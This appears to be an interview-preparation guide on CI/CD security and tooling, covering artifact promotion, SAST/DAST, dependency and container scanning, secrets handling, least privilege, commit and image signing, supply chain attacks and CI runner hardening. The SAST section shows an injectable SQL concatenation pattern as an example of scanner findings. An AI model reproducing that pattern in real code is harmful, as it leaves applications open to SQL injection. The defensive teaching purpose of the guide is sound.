- “How do you handle A/B testing for server-side changes (like a different algorithm)?” Same principle, different implementation. Instead of rendering different UI, the API returns different results based on the experiment group. The group assignment happens server-side based on the user ID. Log the experiment assignment alongside the event tracking so the analytics pipeline can attribute outcomes to the right variant. For ML models, this is standard: “model A” vs “model B” serving different recommendations, with A/B metrics tracked through the recommendation click-through pipeline.
30. Environment Promotion
30. Environment Promotion
- The Docker image
myapp:a1b2c3dis built once in CI. That exact image (same SHA256 digest) is deployed to dev, then staging, then production. - Configuration that differs between environments (database URL, API keys, feature flags, log levels) is injected at runtime via environment variables, ConfigMaps, or a config service.
- Never rebuild for production. If you rebuild, you risk: different dependency versions resolved (a transient version got published between your CI build and your “prod build”), different build flags, different build environment state. “But it worked in staging” almost always traces back to a different artifact.
- Tag-based: After staging tests pass, tag the image
staging-approved. After prod smoke tests, tagprod-release-2024-01-15. Promotion = adding a tag. - Registry-based: Copy the image from a staging registry to a production registry. This provides network isolation (production pulls from a production-only registry).
- GitOps-based: Update the image tag in the environment-specific Kustomize overlay or Helm values file. A PR to the
prod/directory triggers production deployment after review.
- Kubernetes ConfigMaps and Secrets mounted as environment variables or files.
- AWS Parameter Store / Secrets Manager with application-level SDK.
- Spring Cloud Config, Consul KV for application configuration.
- 12-Factor App methodology: all config is in the environment, never in code.
-
“How do you verify that the image in production is the same one that was tested in staging?”
Compare Docker image digests (
sha256:abc...). Tags are mutable (you can re-tag a different image asv1.2.3), but digests are immutable (derived from the image content). In your CD pipeline, record the digest after build, verify the digest matches at each promotion step. Container signing (Cosign, Notary) adds cryptographic verification — the CI pipeline signs the image, and the production cluster only admits images with a valid signature from your CI signer. - “What about configuration drift between environments — staging config doesn’t match production?” This is a real problem. Staging might have different instance counts, different feature flags, or different third-party API endpoints that behave differently. Mitigation: automate environment configuration through code (Terraform, Helm values files). Diff environment configs in Git and review the differences. For critical services, run a periodic config comparison that alerts on drift. Some teams maintain a “production parity” score that measures how similar staging is to production across dimensions like instance types, replica counts, and configuration values.
-
“How do you handle environment-specific secrets in promotion?”
Secrets are never in the artifact. Each environment has its own secret store (Vault path, AWS Secrets Manager secret). The application reads secrets at startup using an environment-specific identifier. In Kubernetes:
ExternalSecretresources reference different AWS secrets per namespace (dev/db-passwordvsprod/db-password). The artifact has no knowledge of the secret values — it only knows the key name (DATABASE_PASSWORD) and reads it from the environment.
4. Security (DevSecOps)
31. SAST vs DAST
31. SAST vs DAST
-
SAST (Static Application Security Testing): Analyzes source code, bytecode, or binaries without executing the application. It reads the code and looks for vulnerability patterns.
- How it works: Parses source code into an Abstract Syntax Tree (AST), applies rules to detect patterns. Example:
"SELECT * FROM users WHERE id = " + userInputmatches a SQL injection rule. Advanced tools use taint analysis — tracking untrusted input (e.g., HTTP request parameters) through code paths to see if it reaches a sensitive sink (database query, file system operation, eval) without sanitization. - Tools: SonarQube, Semgrep, CodeQL (GitHub), Checkmarx, Fortify, Bandit (Python), gosec (Go).
- Strengths: Finds vulnerabilities early (in the IDE or CI), pinpoints the exact line of vulnerable code, works on incomplete/undeployable code.
- Weaknesses: High false positive rate (flags code that looks vulnerable but is actually safe due to context). Can’t detect runtime issues (misconfigurations, authentication bypass through middleware, business logic flaws). Doesn’t understand the deployed architecture.
- How it works: Parses source code into an Abstract Syntax Tree (AST), applies rules to detect patterns. Example:
-
DAST (Dynamic Application Security Testing): Tests the running application from the outside, like an attacker would. It sends malicious inputs and observes the responses.
- How it works: Crawls the application to discover endpoints. Sends attack payloads (SQL injection strings, XSS payloads, path traversal sequences). Analyzes responses for evidence of successful exploitation.
- Tools: OWASP ZAP (open-source), Burp Suite, Nuclei, StackHawk.
- Strengths: Finds real, exploitable vulnerabilities (low false positive rate). Tests the actual deployed configuration (CORS headers, TLS settings, authentication flows). Finds runtime issues that SAST can’t see.
- Weaknesses: Can’t pinpoint the vulnerable line of code. Requires a running application (later in pipeline). Slow (crawling + testing takes 15-60 minutes). Can’t test code paths that aren’t reachable through the UI/API.
-
“How do you handle SAST false positives that flood the developer with noise?”
Tune the rules. Start with a small, high-confidence rule set and expand gradually. Suppress specific findings with inline comments (
// nosecin gosec,// nolint:gosecin golangci-lint) after security team review. Use SonarQube’s “Won’t Fix” status to exclude validated false positives. Track the false positive rate — if it’s above 30%, developers will ignore all findings. Custom Semgrep rules tailored to your codebase patterns produce much fewer false positives than generic rule sets. - “What’s IAST and how does it differ?” IAST (Interactive Application Security Testing) instruments the running application and observes actual code execution during tests. It combines SAST’s code visibility with DAST’s runtime context. When your integration tests hit an endpoint, IAST tracks the request through the code and can say “this SQL query at line 47 was built using unsanitized input from the HTTP request.” Tools: Contrast Security, Hdiv. Advantage: low false positive rate + exact code location. Disadvantage: requires agents/instrumentation in the application runtime, which can add latency and complexity.
- “Where does DAST fit in the CI/CD pipeline?” After deployment to a test/staging environment. DAST needs a running, accessible application. Run a fast DAST scan (5-10 minutes, limited scope) in the staging pipeline as a gate. Run a full DAST scan (30-60 minutes, full crawl) nightly or weekly. Never run DAST against production without explicit approval — attack payloads can create garbage data, trigger alerts, or cause instability. Some teams run DAST in a dedicated “security testing” environment that mirrors production.
32. Dependency Scanning (SCA)
32. Dependency Scanning (SCA)
- Parse dependency manifests:
package-lock.json,go.sum,requirements.txt,pom.xml,Gemfile.lock. - Build a dependency tree (including transitive dependencies — your dependency’s dependencies).
- Match each dependency version against CVE databases.
- Report: CVE ID, severity (CVSS score), affected version range, fixed version, exploit availability.
- Block on Critical/High in CI. A PR that introduces a dependency with a known critical CVE should not merge.
- Alert on Medium. Create tickets, fix within SLA (e.g., 30 days for Medium, 7 days for High, 24 hours for Critical with known exploit).
- Auto-update: Dependabot/Renovate creates PRs automatically when new versions are available. Auto-merge patch updates that pass tests. Require manual review for major version updates.
- License compliance: SCA tools also scan licenses. Your legal team might prohibit AGPL dependencies in a commercial product. Flag license violations in CI.
-
“A critical CVE is found in a transitive dependency 4 levels deep. How do you fix it?”
First, check if a newer version of your direct dependency includes the fix (often it does —
npm audit fixornpm updateresolves many transitive issues). If not, use override/resolution mechanisms:npm overrides(npm 8+),yarn resolutions, or MavendependencyManagementto force the patched version. If no patched version exists, evaluate: is the vulnerability actually exploitable in your usage? (many CVEs require specific conditions). If yes and no fix exists, consider replacing the dependency or implementing a workaround (input validation that blocks the exploit vector). - “How do you handle the alert fatigue from hundreds of dependency vulnerabilities?” Prioritize by: (1) exploitability — is there a known exploit in the wild? (EPSS score), (2) reachability — does your code actually call the vulnerable function? (Snyk’s reachability analysis), (3) exposure — is the vulnerable component internet-facing or internal-only? A critical CVE in a dev-only testing utility has lower real-world risk than a medium CVE in your authentication library. Group related vulnerabilities (10 CVEs in the same library = 1 action item: upgrade the library). Set realistic SLAs and track compliance rather than trying to fix everything immediately.
- “What’s the difference between Dependabot and Renovate?” Dependabot: GitHub-native, simpler configuration, creates individual PRs per dependency update, limited customization. Renovate: More powerful grouping (batch all patch updates into one PR), scheduling (update only on Mondays), auto-merge rules (auto-merge patch updates with passing tests), works on any platform (GitHub, GitLab, Bitbucket). For teams with many repos and dependencies, Renovate’s grouping alone saves hours of PR review. Dependabot is better for small projects that want zero configuration.
33. Container Scanning
33. Container Scanning
ubuntu:22.04 base image ships with 100+ packages, any of which might have CVEs.What gets scanned:- OS packages:
apt,apk,yumpackages in the image. A vulnerableopensslorglibccan be exploited regardless of your application code. - Application dependencies: Some scanners also check installed language packages (
pip,npm,gempackages in the image layers). - Misconfigurations: Running as root, exposed ports, missing health checks, insecure mount points. Tools like Dockle check Dockerfile best practices.
- Secrets: Accidentally baked-in secrets (API keys in environment variables, credential files in image layers). Even if you delete a file in a later layer, it exists in the earlier layer and can be extracted.
- CI pipeline: Scan after building the image, before pushing to registry. Block on Critical/High findings.
- Registry: Scan on push and periodically (new CVEs are published daily). ECR and GCR have built-in scheduled scanning.
- Runtime: Continuously monitor running containers for newly discovered vulnerabilities. A container that was clean when deployed might have a new critical CVE discovered a week later.
- Use minimal base images:
alpine(5MB, ~50 packages) vsubuntu(77MB, ~300 packages). Fewer packages = fewer potential vulnerabilities. - Use distroless images (Google): only your application binary, no shell, no package manager. Attack surface: near zero. You can’t
execinto the container because there’s no shell. - Multi-stage builds: build stage has compilers and tools, runtime stage has only the binary and minimal dependencies.
node:18 is based on Debian and ships with hundreds of packages, many with known CVEs.Follow-up:-
“A scan finds 200 vulnerabilities in your base image. How do you prioritize?”
Filter by fixability first — how many have a patched version available? Of those, prioritize by severity (Critical > High), exploitability (is there a known exploit?), and relevance (is the vulnerable package actually used at runtime?). Quick wins: update the base image to the latest patch version (
alpine:3.18.0toalpine:3.18.4). For vulnerabilities without fixes, assess risk: is the vulnerable function reachable? Is the container network-isolated? Accept the risk with documentation, or switch to an alternative base image. -
“How do you prevent secrets from being baked into Docker images?”
Use multi-stage builds: copy secrets into the build stage (for accessing private registries during
npm install), then don’t copy them to the runtime stage. Use Docker BuildKit secrets (--mount=type=secret,id=npmrc) which are available during build but never persisted in image layers. Never useENVfor secrets (they’re visible in image metadata). NeverCOPY .envinto the image. Use.dockerignoreto exclude.env,.git, and credential files. Scan images for secrets using tools like Trivy’s secret scanning or ggshield. - “Should you scan third-party images you pull from Docker Hub?” Absolutely. Third-party images are untrusted code running in your infrastructure. Scan them the same as your own images. Better: maintain an approved base image registry (Harbor as a proxy/cache for Docker Hub with scanning enabled). Only images that pass scanning are available to developers. Some organizations maintain their own hardened base images, rebuilt weekly from upstream sources with vulnerability patches applied.
34. Secrets Management in CI
34. Secrets Management in CI
- Never commit secrets to Git. Not even in “private” repos. Git history is forever — a secret committed and immediately removed is still in
git log. Use.gitignorefor.envfiles. Use pre-commit hooks (gitleaks, detect-secrets) to catch accidental commits. - Use platform-native secret storage. GitHub Actions: Encrypted Secrets (repo, environment, or organization level). GitLab CI: CI/CD Variables (masked, protected). Jenkins: Credentials Plugin. These are encrypted at rest and injected as environment variables at runtime.
- Use a proper secrets manager for production. HashiCorp Vault, AWS Secrets Manager, GCP Secret Manager, Azure Key Vault. These provide: dynamic secrets (generate a database credential that expires in 1 hour), rotation, audit logs, fine-grained access control.
- Mask secrets in logs. CI platforms auto-mask secrets they know about, but custom secrets or secrets derived from operations might leak. Never
echo $SECRETin a pipeline. Be careful with debug flags that dump environment variables. - Scope secrets narrowly. Don’t give every pipeline access to production secrets. Use environment-level secrets (only the
productionenvironment has the prod database password, and deployments toproductionrequire manual approval). Use the principle of least privilege — the linting stage doesn’t need the deploy key.
- Error messages that include connection strings:
Failed to connect to postgres://admin:p4ssw0rd@prod-db:5432. - Dependency installation logs that echo auth tokens:
npm install --registry https://token:abc123@registry.npmjs.org. - Terraform state files that contain resource attributes (including passwords) stored in an unencrypted S3 bucket.
- Docker build args (
ARG) visible in image history (docker history).
-
“A secret was accidentally committed to Git. What do you do?”
Immediate action: rotate the secret NOW (generate new credentials, revoke old ones). Don’t wait to clean Git history — assume the secret is compromised. Then: use
git filter-branchor BFG Repo Cleaner to remove the secret from Git history. Force-push (coordinate with team). Check audit logs: was the secret accessed during the exposure window? Run GitHub’s secret scanning alerts to check if it was detected by partners (GitHub automatically revokes some leaked tokens). Post-incident: add pre-commit hooks to prevent recurrence. - “How do you handle secret rotation in a zero-downtime system?” Use dynamic secrets (Vault generates a new database credential per deployment, valid for 24 hours — no rotation needed, credentials are ephemeral). For static secrets: rotate by deploying a new version that picks up the new secret, while the old secret remains valid during the transition window. For database passwords: create a second user with the new password, deploy the app pointing to the new user, then disable the old user. Vault’s database engine automates this. Never rotate by updating a secret and restarting all instances simultaneously — that’s a self-inflicted outage.
- “How do you audit who accessed which secret and when?” Vault provides detailed audit logs (who authenticated, what secret path they read, when, from which IP). AWS Secrets Manager integrates with CloudTrail. GitHub Actions logs which workflows accessed which secrets (though not the values). For compliance (SOC 2, HIPAA), you need these audit logs stored immutably (append-only log, shipped to a separate account). Set up alerts: if a production secret is accessed from an unexpected IP or at an unusual time, investigate.
35. Least Privilege
35. Least Privilege
- CI runner has
AdministratorAccessIAM policy on AWS. “It needed S3 access, so we gave it admin.” Now a compromised pipeline can delete your entire AWS account. - Deploy key has read/write access to all repositories. “It needed to clone one repo.” Now a compromised pipeline can push malicious code to any repo.
- Terraform runs with a role that can create any resource. “It needed to create EC2 instances.” Now it can create IAM users, open security groups, or launch Bitcoin miners.
- Scope IAM roles per pipeline stage. The “lint” stage needs zero AWS permissions. The “build” stage needs ECR push. The “deploy” stage needs EKS access. Use OIDC federation (GitHub Actions OIDC to AWS, GitLab CI to AWS) for short-lived credentials instead of long-lived access keys.
- Use separate roles per environment. The staging deploy role can’t touch production resources. The production deploy role has additional constraints (e.g., can only update existing deployments, not create new ones).
- Time-bound access. AWS STS temporary credentials (1-hour TTL). Vault dynamic secrets. Never use permanent access keys in CI.
- Restrict network access. Self-hosted runners in a dedicated VPC with security groups. Only allow outbound access to required endpoints (registry, artifact store, deploy target). Block unnecessary internet access.
-
“How do you implement OIDC between GitHub Actions and AWS?”
Configure an OIDC identity provider in AWS IAM pointing to GitHub’s OIDC endpoint. Create an IAM role with a trust policy that specifies which GitHub org, repo, and branch can assume it. In the workflow, use
aws-actions/configure-aws-credentialswithrole-to-assume. No long-lived credentials stored anywhere — GitHub mints a short-lived JWT, AWS exchanges it for temporary STS credentials. The trust policy can restrict: onlymainbranch can assume the production deploy role, feature branches can only assume the staging role. - “A CI pipeline needs to access 5 AWS services. How do you scope the permissions?” Create a custom IAM policy with the minimum actions needed. Use IAM Access Analyzer to generate a least-privilege policy from CloudTrail logs (it shows what the role actually used vs. what it has permission to do). Start with the minimum you think is needed, let the pipeline fail on permission errors, add the specific missing permission. This is more secure than starting broad and never tightening. Document each permission with a comment explaining why it’s needed.
-
“How do you detect and remediate over-privileged CI identities?”
AWS IAM Access Analyzer reports unused permissions. Run it monthly: if the CI role has S3 delete permission but never used it in 90 days, remove it. Use Service Control Policies (SCPs) as a guardrail: even if a CI role has
iam:*, the SCP prevents it from creating new IAM users. Implement CI-specific AWS accounts with restrictive SCPs as a safety net. Alert on unusual API calls from CI identities (creating new IAM users, modifying security groups, accessing KMS keys they’ve never used).
36. Signed Commits
36. Signed Commits
git config user.email "ceo@company.com" and create commits that appear to be from the CEO.Why it matters:- Supply chain attacks: An attacker who compromises a developer’s account could push malicious code. If commits are unsigned or signed with a different key, the review process can catch it.
- Audit compliance: Regulated industries require traceability of who made which change. Git’s
authorfield is self-reported. A GPG signature provides cryptographic proof. - Branch protection: GitHub can require signed commits on protected branches. Unsigned commits can’t be merged to
main.
- Developer generates a GPG key pair. Registers the public key on GitHub/GitLab.
git config --global commit.gpgSign trueenables auto-signing.- Each commit includes a GPG signature that can be verified with the developer’s public key.
git log --show-signatureshows verification status. GitHub shows a green “Verified” badge.
- Start with awareness, not enforcement. Enable “Vigilant mode” on GitHub (shows “Unverified” on unsigned commits) so developers see the gap.
- Provide setup documentation and scripted configuration.
- Enforce signing on
mainbranch via branch protection rules. - Handle service accounts and bots: they need their own signing keys (GitHub Apps can sign with their built-in identity).
-
“What about CI/CD bots that need to create commits (version bumps, changelog updates)?”
Use a GitHub App or a dedicated service account with its own GPG/SSH key. GitHub Apps can sign commits with the app’s identity (
github-actions[bot]). Never share a human developer’s signing key with a CI system. For Dependabot and Renovate, they create commits signed with their own identities. The principle: every commit should be traceable to either a human or a specific, auditable automation identity. - “A developer’s GPG key is compromised. What do you do?” Revoke the key on GitHub (remove it from the developer’s profile). Revoke it on the GPG keyservers. Generate a new key pair. Audit recent commits signed with the compromised key — were any unauthorized changes made? Old commits signed with the revoked key will show as “Unverified” in the future, which is the correct behavior (we can no longer trust that key). This is similar to certificate revocation in TLS.
-
“Is commit signing worth the overhead for a small team?”
For a 5-person startup: probably not enforced, but it’s good practice. The real value comes when you have many contributors, open-source projects, or compliance requirements. However, SSH signing with
git config --global gpg.format sshis so easy to set up that there’s little reason not to enable it. The bigger question is: does your threat model include commit impersonation? For open-source projects accepting external contributions, yes. For a private repo with 3 trusted developers, it’s lower priority.
37. Supply Chain Attack
37. Supply Chain Attack
- SolarWinds (2020): Attackers compromised the build system and injected malware into a signed software update. 18,000 organizations installed the backdoored update, including US government agencies. Estimated cost: billions.
- Log4Shell (2021): A vulnerability in Log4j (used by ~35% of Java applications). Not an intentional attack, but demonstrated how a single transitive dependency can expose millions of systems.
- event-stream (2018): npm package maintainer transferred ownership to an unknown developer who injected cryptocurrency-stealing code. 2M weekly downloads.
- ua-parser-js (2021): Popular npm package (8M weekly downloads) was hijacked via compromised maintainer credentials. Malicious version included cryptocurrency miners and credential stealers.
- codecov (2021): Attackers modified the Bash uploader script used in CI pipelines. Every CI pipeline that ran the compromised script leaked environment variables (including secrets) to the attacker.
- Dependency poisoning: Compromise a popular package (typosquatting, account takeover, or malicious contribution).
- Build system compromise: Inject code during the build process (SolarWinds, Codecov).
- Infrastructure compromise: Compromise the CI/CD runner, registry, or deployment target.
- Distribution compromise: Modify artifacts after build but before deployment (registry poisoning).
- Lockfiles:
package-lock.json,go.sum,Pipfile.lock. Pin exact versions AND hashes.npm ci(notnpm install) respects the lockfile strictly. - Vendor dependencies: Copy dependencies into your repo so you’re not affected by upstream deletions or modifications (
go mod vendor, npmbundleDependencies). - SLSA framework: Supply-chain Levels for Software Artifacts. Level 1: build provenance exists. Level 2: provenance is tamper-resistant. Level 3: build runs on hardened, isolated infrastructure. Google, GitHub Actions, and others provide SLSA provenance.
- Dependency review: Review new dependencies before adding them. Check: maintainer reputation, download count, last update date, security audit history. Don’t add a 10-line npm package from an anonymous maintainer when you could write 10 lines of code.
- Reproducible builds: Anyone can rebuild the same source and get the identical artifact. If the official artifact doesn’t match a reproducible build, it was tampered with.
- “How does SLSA protect against the SolarWinds-type attack?” SLSA Level 3 requires that the build runs on hardened, isolated infrastructure that the project developers cannot influence. The build system generates a provenance attestation (signed metadata proving what source code was built, on what infrastructure, with what configuration). Consumers verify the provenance before using the artifact. In the SolarWinds case, the attacker modified the build process — with SLSA Level 3, the build infrastructure would be tamper-resistant and the provenance would show if the build process was modified.
- “A developer wants to add a new npm package with 50 weekly downloads and 1 contributor. How do you evaluate the risk?” Red flags: low download count, single maintainer, no organizational backing, no security audits, recently published. Evaluate: can we write the functionality ourselves? (often yes for small utilities). If we must use it, can we vendor it (copy the source into our repo and audit it)? If we depend on it from npm, can we pin to a specific version hash and set up alerts for any new versions? The broader principle: every dependency is an attack surface. The cost of adding a dependency includes the ongoing cost of monitoring it.
-
“How do you verify the integrity of CI/CD tools themselves (GitHub Actions, Docker, kubectl)?”
Pin Action versions to commit SHAs, not tags (
uses: actions/checkout@a1b2c3d, not@v3— tags can be moved). Verify checksums of downloaded tools (curl | sha256sum -c). Use official package repositories with signature verification. For critical tools, use signed releases (Docker releases are GPG-signed, kubectl releases include checksums). Store tool versions in lockfiles or pinned configurations so they don’t silently update.
38. Image Signing
38. Image Signing
- CI pipeline builds a Docker image and pushes it to a registry.
cosign sign --key cosign.key myregistry/myapp@sha256:abc123signs the image digest.- The signature is stored alongside the image in the registry (as an OCI artifact).
- At deployment time, the admission controller (Kyverno, OPA Gatekeeper, Connaisseur) verifies the signature before allowing the image to run.
- If the image is unsigned or signed with an untrusted key, the pod is rejected.
- Registry compromise: If an attacker pushes a malicious image to your registry with the same tag, the admission controller rejects it because it’s unsigned.
- CI pipeline compromise: If an attacker modifies the pipeline to build a different image, the image is signed with a different identity (or not signed at all). The admission controller catches it.
- Compliance: SLSA Level 2+ requires tamper-resistant provenance. Image signing + attestation provides this.
-
“How do you enforce that only signed images run in your Kubernetes cluster?”
Deploy an admission webhook (Kyverno or OPA Gatekeeper) with a policy that rejects pods with unsigned or unverified images. Kyverno policy example:
verifyImagesrule that requires images matchingmyregistry/*to have a valid Cosign signature from a specific key or OIDC identity. Test the policy inAuditmode first (logs violations without blocking), then switch toEnforcemode. Exempt system namespaces (kube-system) that run upstream Kubernetes images. - “What’s the difference between signing with Cosign vs Notary/Docker Content Trust?” Notary (Docker Content Trust, DCT) is the older approach. It uses The Update Framework (TUF) for key management. It’s complex to set up, has limited adoption outside Docker Hub, and requires a separate Notary server. Cosign (Sigstore) is the modern approach: simpler CLI, works with any OCI registry, supports keyless signing via OIDC, has a transparency log (Rekor) for audit. Cosign is now the de facto standard for container signing, endorsed by the Linux Foundation, CNCF, and used by Kubernetes itself.
-
“How do you handle image signing in a multi-team organization?”
Each team has its own signing identity (OIDC-based: the team’s CI workflow has a unique
subclaim). The admission controller policy specifies which signing identities are trusted for which namespaces. Team A’s images can only run in Team A’s namespace. A central platform team manages the signing infrastructure and admission policies. For shared base images, the platform team signs them and all teams’ policies trust the platform team’s identity.
39. Compliance as Code
39. Compliance as Code
OPA policy: deny[msg] if input.resource.aws_s3_bucket.acl == "public-read" — automatically blocked in CI.Tools:- OPA (Open Policy Agent): General-purpose policy engine. Rego language. Used for Kubernetes admission (Gatekeeper), Terraform (Conftest), API authorization. Write policies like “no container can run as root,” “all pods must have resource limits,” “no security group can allow 0.0.0.0/0 on port 22.”
- Kyverno: Kubernetes-native policy engine. Policies written as Kubernetes YAML (not Rego). More accessible for Kubernetes-focused teams. Supports mutation (auto-add labels), validation (reject non-compliant resources), and generation (auto-create NetworkPolicies).
- Checkov / tfsec / Terrascan: Terraform-specific policy scanners. Check IaC for security misconfigurations before provisioning. “This RDS instance doesn’t have encryption at rest” — block before it’s created.
- Sentinel (HashiCorp): Policy engine for Terraform Cloud/Enterprise. Integrates into the
terraform planstep. “This change would add more than 5 public-facing resources — require VP approval.”
- All Docker images must use a specific base image from the approved registry.
- All Kubernetes pods must have CPU/memory limits set.
- No IAM policies can use
*as a resource. - All RDS instances must have encryption at rest and automated backups enabled.
- All S3 buckets must have versioning and server-side encryption.
- No deployment can happen without a passing security scan.
- Security/compliance team writes policies in OPA/Kyverno.
- Policies are version-controlled, tested (with unit tests!), and reviewed like any other code.
- Policies run as CI checks on every PR that modifies infrastructure or Kubernetes manifests.
- Violations produce clear, actionable error messages (not just “denied” — explain why and how to fix).
- Emergency exceptions are tracked: “This resource was exempted from policy X because of reason Y, approved by Z, expires on date W.”
- “How do you test compliance policies themselves?” Write unit tests for policies. OPA has a built-in test framework. Create test fixtures: a compliant resource (should pass), a non-compliant resource (should fail), and an edge case (boundary condition). Run policy tests in CI when policies change. This prevents a policy update from accidentally blocking all deployments. At one company, an untested policy change blocked every pod from deploying because the Rego logic had a typo.
-
“How do you handle exceptions to compliance policies?”
Use annotations or labels to mark approved exceptions. Example: a Kyverno policy that requires resource limits can be bypassed with a specific annotation (
compliance.company.com/exception: JIRA-1234). The annotation references an approved exception ticket with an expiration date. A separate report tracks all active exceptions and their expiration. Expired exceptions are flagged. This provides both automation and audit trail. - “How does compliance as code interact with SOC 2 audits?” SOC 2 requires evidence that controls are in place and operating effectively. Compliance as code provides: (1) the policy definitions (evidence the control exists), (2) CI logs showing the policy ran on every deployment (evidence the control operates), (3) audit logs showing no exceptions were made outside the approved process (evidence the control is effective). This makes SOC 2 audits dramatically faster — instead of gathering screenshots and emails for weeks, you point the auditor at the Git repo of policies and the CI logs.
40. Hardening CI Environment
40. Hardening CI Environment
- Ephemeral runners (clean slate): Every job runs on a freshly provisioned runner that’s destroyed after the job. No state persists between jobs. A compromised job can’t poison the next job’s environment. Implementation: Kubernetes-based runners (new pod per job), EC2 spot instances that terminate after use, containerized runners.
- Network isolation: Runners shouldn’t have unrestricted internet access. Use VPC with restrictive security groups/egress rules. Allow-list only required endpoints: package registries, container registries, cloud APIs. Block all other outbound traffic. A compromised runner can’t exfiltrate data to an attacker’s server if outbound traffic is restricted.
-
No privilege escalation: Runners should not run as root. Docker builds should use rootless Docker or Kaniko (builds images without Docker daemon). Never mount the Docker socket (
/var/run/docker.sock) — that gives the container full control of the host’s Docker daemon. - Audit logs: Log every pipeline execution: who triggered it, what secrets were accessed, what was deployed, from which branch. Ship logs to a SIEM (Splunk, Elastic, Datadog). Alert on unusual patterns (production deploy from a feature branch, secret access at 3 AM, pipeline triggered by an unknown user).
- Dependency integrity: Pin CI action/step versions to commit SHAs. Verify checksums of downloaded tools. Use a dependency proxy/cache so you’re not pulling from the public internet during every build.
-
Branch protection: Production deploy pipelines only run from protected branches (
main,release/*). Feature branches can deploy to dev/staging but never to production. GitHub branch protection + required status checks + required reviews. - Runner isolation by sensitivity: Different runner pools for different workloads. Open-source PRs (untrusted code) run on fully isolated runners with no secret access. Internal builds run on runners with scoped secret access. Production deploys run on highly restricted runners in a separate network.
-
“A malicious PR could modify the CI workflow to exfiltrate secrets. How do you prevent this?”
On GitHub Actions: use
pull_requesttrigger (notpull_request_target) for PR builds —pull_requestruns the workflow from the PR but only with read access and no secrets.pull_request_targetruns with the base branch’s workflow and secrets, which is dangerous if the PR can influence what runs. For Jenkins: useJenkinsfilefrom the trusted branch, not from the PR. For GitLab: userulesto restrict which jobs can access secrets based on the pipeline source (push to main vs. merge request from fork). - “How do you implement runner auto-scaling while maintaining security?” Use Kubernetes-based runners with pod security standards. Each runner pod has restricted securityContext (non-root, read-only root filesystem, dropped capabilities). Network policies isolate runner pods from other cluster workloads. Auto-scaling is based on pending workflow queue depth, not CPU metrics (because you want runners to scale before jobs start waiting). Use node taints/tolerations to schedule runner pods on dedicated nodes, preventing co-location with production workloads.
- “How do you handle CI runner outage detection and recovery?” Monitor: runner availability (percentage of time runners are available for jobs), queue wait time (time jobs spend waiting for a runner), job failure rate due to infrastructure issues (vs code issues). Alert if queue wait time exceeds 5 minutes (runners aren’t scaling fast enough) or if failure rate spikes (runner infrastructure issue). Use multiple availability zones for runners. Have a fallback to SaaS runners if self-hosted runners are unavailable. Implement health checks on runner registration — if a runner becomes unresponsive, deregister it and schedule a replacement.
5. Tools & Troubleshooting
41. Docker in Docker (DinD)
41. Docker in Docker (DinD)
- Requires
--privilegedmode (grants the container nearly full host kernel access). - Security risk: a container escape from the privileged container gives full host access. This is the most dangerous approach.
- Use case: when you need a completely isolated Docker environment (multi-tenant CI where you don’t want tenants sharing a Docker daemon).
/var/run/docker.sock) into the CI container. The CI container uses the host’s Docker daemon.- No
--privilegedneeded. - Security risk: the container can execute any Docker command on the host, including accessing other containers, reading their data, or running privileged containers. Effectively root access on the host.
- Performance: better than DinD because it shares the host’s build cache.
- Use case: trusted CI environments where performance matters.
- No
--privileged, no Docker socket. - Runs as an unprivileged container.
- Limitations: doesn’t support all Dockerfile features (multi-stage builds work, but some exotic features don’t). Build caching is different (uses registry-based cache, not local daemon cache).
- Use case: Kubernetes-based CI where security is paramount. This is the recommended approach for most modern setups.
- Buildah: OCI-compliant image builder, daemonless. Can run rootless. More feature-complete than Kaniko.
- BuildKit (with rootless mode): Docker’s next-generation builder. Can run without root privileges.
- Podman: Daemonless, rootless alternative to Docker. Compatible CLI interface.
-
“Your CI builds Docker images on Kubernetes. How do you set it up securely?”
Use Kaniko as a sidecar or init container. The CI job creates a
kaniko-executorcontainer with the Dockerfile and build context mounted as a volume. Kaniko builds the image and pushes to the registry without needing Docker. No privileged mode, no socket mounting. For caching, configure Kaniko to use a registry-based cache (--cache=true --cache-repo=myregistry/cache). This is the setup used by GitLab CI on Kubernetes and recommended by most Kubernetes security guides. - “What’s the performance difference between DinD, socket mounting, and Kaniko?” Socket mounting is fastest because it shares the host’s build cache (layers are reused immediately). DinD is slower because the inner daemon has its own cache (cold on first build). Kaniko is comparable to DinD for first builds, but with registry-based caching, subsequent builds pull cached layers from the registry (network latency vs local disk). In practice, the performance difference is 10-30 seconds per build — rarely the bottleneck compared to security risk.
- “Can you run Docker Compose in CI for integration tests?” Yes, but it requires Docker-in-Docker or socket mounting (Compose needs a Docker daemon). For Kubernetes-based CI, alternatives: use Testcontainers (programmatically start containers via the API — works with DinD or socket), or use Kubernetes manifests/Helm to deploy the test dependencies as pods in the CI namespace. Some teams run a dedicated “integration test” environment with pre-deployed dependencies and the CI job just runs tests against it.
42. Jenkins vs GitHub Actions
42. Jenkins vs GitHub Actions
-
Jenkins:
- Architecture: Self-hosted controller + agents. Controller orchestrates, agents execute. Java-based (JVM). Runs on your infrastructure.
- Configuration: Groovy-based
Jenkinsfile(declarative or scripted). Extensive plugin ecosystem (1,800+ plugins) — but plugin quality varies wildly, and incompatible plugin updates are the #1 source of Jenkins outages. - Strengths: Maximum flexibility. Can do anything (literally anything — it’s a programmable build server). Massive community. Battle-tested for 15+ years. No vendor lock-in. Great for complex enterprise pipelines with custom requirements.
- Weaknesses: Maintenance burden is significant. Plugin hell: updating one plugin breaks another. Scaling requires managing agents (VMs, Kubernetes pods). The UI is dated. Security vulnerabilities in plugins are frequent. “Works on my Jenkins” is a real problem when every Jenkins installation is unique.
- Cost model: Infrastructure + engineering time for maintenance. A team needs ~0.5 FTE to keep Jenkins healthy at scale.
-
GitHub Actions:
- Architecture: SaaS runners (GitHub-hosted) or self-hosted runners. YAML-based workflow files in
.github/workflows/. Event-driven (push, PR, schedule, webhook). - Configuration: YAML. Reusable workflows. Marketplace of community actions (6,000+). Matrix builds for testing across versions/OS.
- Strengths: Zero infrastructure (SaaS). Deep GitHub integration (auto-triggered on PR, status checks, deployments). Marketplace ecosystem. Easy to start. Great documentation.
- Weaknesses: Vendor lock-in to GitHub. YAML can become complex for large pipelines. Debugging is harder (can’t SSH into a failed runner by default, though
tmateaction helps). Limited feature set compared to Jenkins (no dynamic pipeline generation, limited pipeline orchestration). Billing can be expensive at scale. - Cost model: Pay per minute for hosted runners. Free tier for public repos. Self-hosted runners are free (you pay for infra).
- Architecture: SaaS runners (GitHub-hosted) or self-hosted runners. YAML-based workflow files in
| Factor | Jenkins | GitHub Actions |
|---|---|---|
| Already on GitHub? | Overhead | Natural fit |
| Complex enterprise pipelines? | Strong | Limited |
| Team size for CI maintenance? | 0.5+ FTE | Minimal |
